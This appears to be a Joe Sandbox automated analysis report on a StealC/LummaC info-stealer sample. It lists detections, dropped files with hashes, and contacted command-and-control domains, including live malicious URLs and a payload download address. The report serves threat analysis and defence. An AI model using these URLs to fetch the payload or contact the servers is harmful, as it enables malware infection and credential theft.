C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E093.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	68%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\E093.tmp.exe	68%	ReversingLabs	Win32.Trojan.StealC

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://rapeflowwj.lat/6	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exey	0%	Avira URL Cloud	safe
https://rapeflowwj.lat/apiN	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/apip	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/Y	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/apis	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEf6	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/api1	100%	Avira URL Cloud	malware
http://176.113.115.19/	0%	Avira URL Cloud	safe
https://rapeflowwj.lat/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false		high
rapeflowwj.lat	172.67.220.223	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
energyaffai.lat	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high
https://rapeflowwj.lat/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://rapeflowwj.lat/	E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/6	E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
http://176.113.115.19/ScreenUpdateSync.exe	sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	sqJIHyPqhr.exe	false		high
http://crl.micro	E093.tmp.exe, 00000004.00000003.2580762347.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.0000000000A43000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEf6	sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/apiN	E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/Y	E093.tmp.exe, 00000004.00000002.2679025621.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/apis	E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/	sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/api1	E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exey	sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rapeflowwj.lat/apip	E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/	sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
172.67.220.223	rapeflowwj.lat	United States	13335	CLOUDFLARENETUS	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577877
Start date and time:	2024-12-18 20:54:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sqJIHyPqhr.exe renamed because original name is a hash value
Original Sample Name:	fc0ff134aa4c7a6c02f3d502eb17a1d4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 41 Number of non-executed functions: 336
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 172.202.163.200, 20.190.177.20, 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: sqJIHyPqhr.exe

Simulations

Behavior and APIs

Time	Type	Description
14:55:38	API Interceptor	8673182x Sleep call for process: sqJIHyPqhr.exe modified
14:55:47	API Interceptor	2x Sleep call for process: E093.tmp.exe modified
14:55:57	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	InstallSetup.exe	Get hash	malicious	LummaC	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
172.67.220.223	InstallSetup.exe	Get hash	malicious	LummaC	Browse
176.113.115.19	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rapeflowwj.lat	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
rapeflowwj.lat	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
post-to-me.com	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://52kz793.afratradingagency.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	104.26.6.189
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	http://mee6.xyz	Get hash	malicious	Unknown	Browse	172.66.0.227
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.61.3
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	https://usemployee-hrdbenefits.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	172.67.131.246
	https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=	Get hash	malicious	Unknown	Browse	104.16.79.73
CLOUDFLARENETUS	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://52kz793.afratradingagency.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	104.26.6.189
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	http://mee6.xyz	Get hash	malicious	Unknown	Browse	172.66.0.227
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.61.3
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	https://usemployee-hrdbenefits.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	172.67.131.246
	https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=	Get hash	malicious	Unknown	Browse	104.16.79.73
SELECTELRU	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	82.202.242.100
	2.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	1.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	GO.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	file.exe	Get hash	malicious	Unknown	Browse	176.113.115.178
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	172.67.220.223
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.220.223
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc	Browse	172.67.220.223
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	172.67.220.223
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	172.67.220.223
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	172.67.220.223
	0Vwp4nJQOc.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.220.223
37f463bf4616ecd445d4a1937da06e19	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.67.179.207
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.67.179.207
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\E093.tmp.exe	InstallSetup.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	InstallSetup.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_E093.tmp.exe_52b86cb6b71e77963fa34545984c262daa49c7b_5c90122f_478904bf-6054-4d9f-ac81-d6d9eff5e814\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9708416190378537
Encrypted:	false
SSDEEP:	96:Ln6WVQd+Sslhr372fhQXIDcQPc6ENcEWcw3t+HbHg/8BRTf3Oy1E45WAU6NCUtWD:z6MS40RgNsOju3mmzuiFkZ24IO8h
MD5:	C3D294BF3C34BBAF73989C0BDAAE7398
SHA1:	E0ABB4A34E95663D9990BC85B71B651DDDE5C860
SHA-256:	16B051CB6585C1A905FB758445068C88E1D1E5162E2237AAA31BE6957433C08B
SHA-512:	6776700562C60FDBB9FC13E3CD0F2146E7DF2650EF3F2180B1CA6409BC88F9FDF85CC5562EF4D74561FDB5F528862C00420FD566182C970B3B0B32FE756549B7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.2.5.3.4.9.2.7.9.2.7.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.2.5.3.4.9.8.1.0.5.1.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.8.9.0.4.b.f.-.6.0.5.4.-.4.d.9.f.-.a.c.8.1.-.d.6.d.9.e.f.f.5.e.8.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.f.6.9.1.4.1.-.2.2.f.6.-.4.6.b.d.-.9.2.0.f.-.c.9.2.b.a.a.9.f.3.0.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.0.9.3...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.c.-.0.0.0.1.-.0.0.1.4.-.8.0.f.0.-.5.4.d.1.8.6.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.7.9.e.c.2.e.6.7.1.0.2.3.2.6.8.1.1.8.a.2.c.b.7.c.c.d.a.c.e.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.1.7.d.a.5.4.9.8.5.6.f.d.1.c.b.8.8.7.6.d.6.a.a.9.7.f.2.0.4.f.4.6.e.4.2.a.2.f.e.!.E.0.9.3...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1AF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 18 19:55:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	45316
Entropy (8bit):	2.545427150948013
Encrypted:	false
SSDEEP:	192:EiFXoH/h4IIpfZOx1Bg6fQHnpVsSLmz2/myityI+X0uPQ4KAeX:YHxIuTBdfQHPG8R9PQ49eX
MD5:	198FB6943C03605D81412B64EB88815B
SHA1:	B90E1CBE71F6536FAC21C5AD10BD27188810AA59
SHA-256:	9D4BC8EC980474CB3F2FDBBF8B0343C4DF9BD2387FDF5F7D24FCA8533650FB6F
SHA-512:	B1E4928E225378E60278EE7F8DA90C1DE0F4906FE7BC5FA3F024B7058BA3F6BC5113E9F0D411C4839DA0D47A273B4E6908E7F922D29E646F01F0616732B19E6F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........(cg............4...............H.......<...........t....,..........`.......8...........T............?...q..........P...........< ..............................................................................eJ....... ......GenuineIntel............T............(cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2B9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.700467696358428
Encrypted:	false
SSDEEP:	192:R6l7wVeJM76096YSX6jegmfgCnEpDG89bJrsfVDm:R6lXJQ6e6Ya66gmfgCGJwf8
MD5:	ECCA51F942491DB43B6DB3B7072B69B1
SHA1:	F4AC92A64B9DC210B0FD3A5FB3AB0C3E3B2B9FA7
SHA-256:	EA22FE5808BFB66C11E75A8B793E931D8CABE875680D848BB1215A62C36E0C80
SHA-512:	9ED695BA92D6E3E282F007C986D9709B8AC6F482AE3A64B200D90171593824DABEEF5EE031B7DAFE3E6982C3E64DB76CEF8054595497C48CE9E3B72C3268274A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2DA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.44604482192978
Encrypted:	false
SSDEEP:	48:cvIwWl8zsGJg77aI9kPWpW8VYSYm8M4JhKEUZFz+q8qbp6+njDzMed:uIjfcI7ue7VSJgLnjDzMed
MD5:	A6FD7569F1094AD1184711AB241F8417
SHA1:	6C7AEC862258D42342DCB7B139860281543778AD
SHA-256:	C96B13DB5D81AF9DDDA3FED9F2207DDE689FC4BB883FD6740570524AC38B4EB0
SHA-512:	EC35D26B89452CB3D74614C7E78CDBD1330369D370156C75755465F6CD6953F9CD1E7682D7A87DB4180125884984E57C9EE5D20DD267E3C0354B64A46380C689
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637138" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\sqJIHyPqhr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: InstallSetup.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Download File

Process:	C:\Users\user\Desktop\sqJIHyPqhr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: InstallSetup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.568448729876847
Encrypted:	false
SSDEEP:	6144:qoPefZnQMa3tfL9bn90foomgsattlbSldrUHT7hSgkSNv0juQJYchUJvTGAlBsLn:nPZAooVJHnsg/d1TTqG6
MD5:	6ACDEB4ADEEA0F72C5C17F8D9FEED208
SHA1:	1F154F86F75A29F6D809904CCE653E6FED2E63BF
SHA-256:	9CA883B4472B8D48CDAF3DA2EF0D26F3CFEE0845925DC8D8A031D4C4C20165F6
SHA-512:	B9D5976264A4A302B6E4AEFF0E7C576F71AA10A2442BDB2681B1BEB6E4CDDA2962258F266DE634A28CF45F3F13BDC68C89C4ADE7B310321B1A4B0FA7C0E1F278
Malicious:	false
Preview:	regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^..Q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.017370463528963
